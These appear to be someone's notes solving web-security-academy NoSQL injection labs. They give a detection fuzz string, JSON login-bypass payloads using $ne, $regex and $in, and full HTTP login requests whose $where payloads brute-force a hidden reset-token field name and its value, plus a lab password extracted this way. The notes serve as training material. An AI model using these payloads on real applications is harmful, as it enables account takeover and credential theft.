- Detecting
-- Fuzz string: %27%22%60%7b%0a%3b%24%46%6f%6f%7d%0a%24%46%6f%6f%20%5c%78%59%5a
-- Mongo: || or 
-- To solve: Food+%26+Drink'||'1'=='1

- Bypass auth
-- Solve: {"username":{"$regex":"admin.*"},"password":{"$ne":""}}
-- Example: {"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}
                        -- in this array                                            -- Where password is not empty

- Extract Data
-- Found admin: /user/lookup?user=administrator
-- Get admin pass
-- -- send to intruder
-- -- cluster 1st payload as numbers 1 to len and 2nd payload as [a-zA-Z0-9]
-- pass: njjhjcox

- Hidden fields
-- Reset token name: resetToken
-- Token: 1eb7aa47be284f77
-- To get field name:
------------------------------------------------------------
POST /login HTTP/2
Host: 0a7c00e403f64091814b613900ee0035.web-security-academy.net
Cookie: session=9teA3TeZE4n6sa5FLkPMXnN9h3AiR8oA
Content-Length: 64
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: https://0a7c00e403f64091814b613900ee0035.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a7c00e403f64091814b613900ee0035.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"username":"carlos","password":{"$ne":"invalid"},"$where":"Object.keys(this)[3].match('^.{§§}§§.*')"}
-------------------------------------------------------------------------
-- To get value
------------------------------------------------------------
POST /login HTTP/2
Host: 0a7c00e403f64091814b613900ee0035.web-security-academy.net
Cookie: session=9teA3TeZE4n6sa5FLkPMXnN9h3AiR8oA
Content-Length: 64
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: https://0a7c00e403f64091814b613900ee0035.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a7c00e403f64091814b613900ee0035.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"username":"carlos","password":{"$ne":"invalid"},"$where":"this.resetToken.match('^.{§§}§§.*')"}
----------------------------------------------------------------------------